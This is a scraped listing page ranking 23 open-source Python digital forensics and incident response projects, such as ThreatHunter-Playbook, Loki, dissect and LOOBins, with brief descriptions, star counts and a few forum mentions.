SaaSHub helps you find the best software and product alternatives Learn more →
Top 23 Python Dfir Projects
-
ThreatHunter-Playbook
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
-
Digital-Forensics-Guide
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
-
beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)
-
SaaSHub
SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives
-
Hunting-Queries-Detection-Rules
KQL Queries. Defender For Endpoint and Azure Sentinel Hunting and Detection Queries in KQL. Out of the box KQL queries for: Advanced Hunting, Custom Detection, Analytics Rules & Hunting Rules.
-
dissect
Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).
-
lookyloo
Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other.
-
misp-warninglists
Warning lists to inform users of MISP about potential false-positives or other information in indicators
-
LOOBins
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in "living off the land" macOS binaries and how they can be used by threat actors for malicious purposes.
-
SaaSHub
SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives
Project mention: My Boss Downloaded and Opened a .lnk File and Installed a Malware in His Device | /r/computerforensics | 2023-06-06You should run a tool like loki for ioc scanning. This will identify persistence https://github.com/Neo23x0/Loki
If you're looking to learn on your own, try mikeroyal's digital forensics guide on Github. There's a lot of recommended resources there that'll speed you up. https://github.com/mikeroyal/Digital-Forensics-Guide
Project mention: My productivity app is a never-ending .txt file | news.ycombinator.com | 2024-02-19
You want Turbinia and DFTimewolf. Literally the tools built by the DF team at Google (the same team that makes L2T) purpose-built to do exactly what you're asking.
Project mention: RecuperaBit: A tool for forensic file system reconstruction | news.ycombinator.com | 2024-02-07
I’m excited to announce the release of Living Off the Orchard: macOS Binaries (LOOBins)!
LOOBins is a resource designed to help cybersecurity professionals and researchers understand and defend against the potential risks associated with binaries built into macOS.
https://loobins.io
Python Dfir related posts
-
RecuperaBit: A tool for forensic file system reconstruction
-
Advanced Hunting queries every admin should use
-
LOOBins
-
Saving cached telegram messages from Edge
-
Lists
-
Report tips and note taking tips
-
please help, need disk recovery software free or cheap
-
A note from our sponsor - SaaSHub
www.saashub.com | 4 May 2024
Index
What are some of the best open-source Dfir projects in Python? This list will help you:
Project | Stars | |
---|---|---|
1 | ThreatHunter-Playbook | 3,873 |
2 | Loki | 3,248 |
3 | IntelOwl | 3,114 |
4 | timesketch | 2,492 |
5 | yeti | 1,633 |
6 | Digital-Forensics-Guide | 1,343 |
7 | beagle | 1,250 |
8 | threathunting | 1,102 |
9 | hindsight | 1,020 |
10 | Hunting-Queries-Detection-Rules | 1,007 |
11 | dissect | 856 |
12 | CyberThreatHunting | 793 |
13 | ThreatIngestor | 786 |
14 | mac_apt | 718 |
15 | turbinia | 714 |
16 | lookyloo | 655 |
17 | atc-react | 571 |
18 | RecuperaBit | 504 |
19 | iocextract | 486 |
20 | misp-warninglists | 478 |
21 | PurpleCloud | 474 |
22 | dfirtrack | 464 |
23 | LOOBins | 387 |
Sponsored